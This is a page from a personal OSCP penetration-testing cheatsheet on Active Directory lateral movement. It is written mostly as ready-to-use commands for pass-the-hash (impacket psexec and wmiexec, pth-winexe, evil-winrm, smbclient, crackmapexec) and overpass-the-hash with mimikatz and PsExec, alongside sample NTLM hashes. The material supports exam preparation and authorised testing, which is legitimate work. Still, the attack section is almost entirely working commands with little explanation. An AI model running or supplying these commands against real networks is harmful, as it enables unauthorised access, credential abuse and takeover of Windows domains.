Kashishtopi
  • whoami
    • Little bit more about me
  • OSCP Cheatsheet
    • Cheatsheet
      • Scanning
      • Ports
        • 80/443 - HTTP(s)
        • 139/445 - SMB
        • 21 - FTP
        • 53 - DNS
        • 22 - SSH
        • 389/636/3268 - LDAP
        • 161 - SNMP
        • 25 - SMTP
        • 3389 - RDP
        • 135/593 - RPC
        • 5985/5986 - Evil-winrm
        • 3306 - MYSQL
        • 1433 - MSSQL
      • Shells
        • TTY shells
      • File Transfers
      • Host Web Server
    • Attacks
      • WebShell
      • Password Cracking
        • Bruteforce
        • Hash Crack
        • Create Wordlist
      • File Uploads
        • HTML (.hta)
        • Macro
        • OLE
      • LFI / RFI
      • Shellshock
      • Github
      • SQLi
        • MYSQL
        • MSSQL
    • Linux PrivEsc
      • Automated
      • Methodology
      • Quick wins
      • Manual Enum
      • Kernel Exploits
      • SUID
      • Insecure File Perm
      • Password Loot
      • Restrict Shell Escape
      • Sudo
      • Docker
      • Cron Jobs
      • Device Drivers
      • Unmounted Drives
      • Capabilities
      • NFS Root Squashing
    • Windows PrivEsc
      • Kernel exploit
      • Manual
      • Quick Wins
      • Password loot
      • Run As
      • SE Privileges
      • Unquoted Service Path
      • Scheduled Tasks
      • AlwaysInstallElevated
      • Insecure File permission
      • Windows Subsystem
      • UAC Bypass
      • .ODT - Htdocs
      • Autoron
      • upnuphost
    • Active Directory
      • We got Users but no Pass?
      • Enumeration
      • Authentication
      • Pivoting
      • Lateral Movement
      • Hash Dumping
      • Persistence
Powered by GitBook
On this page
  • Pass the Hash
  • Overpass the Hash

Was this helpful?

  1. OSCP Cheatsheet
  2. Active Directory

Lateral Movement

Hey, Why are you here? Do you have HASH or PASSWORD? Users Hash and Kerberos Ticket. Why crack Hashes and Passwords when you can pass them?

Pass the Hash

Pass The Hash -> NTLM Hash Only
# Requires local admin privs

# Hashes
1) impacket-psexec -hashes ":d098fa8675acd7d26ab86eb2581233e5" <user>@<DC IP>
1) impacket-psexec -hashes ":d098fa8675acd7d26ab86eb2581233e5" <domain>/<user>@<DC IP>
3) impacket-wmiexec -hashes ":32196B56FFE6F45E294117B91A83BF38" Administrator@<IP>

# Password
1) impacket-psexec <user>:<password>@<ip> # Try impacket-psexec
1) impacket-psexec <domain>/<user>:<password>@<ip> # Try impacket-psexec

3) pth-winexe -U Administrator%<NTLM Hash>:<NTLM Hash> //<IP> cmd
3) pth-winexe -U Administrator%<NTLM Hash>:<SHA1 Hash> //<IP> cmd                                            

3) evil-winrm -i <IP> -u <User> -H <HASH>

4) python smbclient.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@<IP>
5) pth-smbclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //<IP>/c$
6) crackmapexec smb <IP> -u Administrator -H <hash> -x ipconfig

Overpass the Hash

Turn NTLM hash to Kerberos ticket and Avoid NTLM Auth.
# Requires local admin privs

mimikatz
sekurlsa::pth /user:<username> /domain:<domain_name> /ntlm:<ntlm_hash> /run:PowerShell.exe
# New PowerShell prompt.
net use \\dc01 # To authenticate to a DC and generate a TGT and TGS.

.\PsExec.exe \\dc01 cmd.exe # With the Help of TGT we log in to the account.
PreviousPivotingNextHash Dumping

Last updated 1 year ago

Was this helpful?

LogoWindows & Active Directory Exploitation Cheat Sheet and Command Reference
LogoLateral Movement: Pass the Hash Attack - Hacking ArticlesHacking Articles